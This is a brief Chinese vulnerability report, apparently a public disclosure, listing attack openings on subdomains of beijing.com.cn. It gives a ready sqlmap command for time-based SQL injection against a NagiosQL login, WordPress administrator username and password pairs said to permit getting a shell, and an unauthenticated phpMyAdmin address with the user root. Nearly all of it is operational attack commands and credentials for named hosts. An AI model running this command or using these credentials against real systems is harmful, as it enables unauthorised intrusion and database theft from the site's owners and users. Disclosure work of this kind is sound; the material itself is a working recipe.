支付安全,这域名好吖,北京欢迎你!

1.注入点:

python sqlmap.py -u "https://db.beijing.com.cn/nagiosql//index.php" --data="tfUsername=1&tfPassword=1*" --threads=10 --technique=T --dbms=mysql --dbs
 


 

2.wordpress管理弱口令,传说可以getshell

admin/admin

in5arts/in5arts
 





3.pma未授权访问

https://club.beijing.com.cn/phpMyAdmin/

root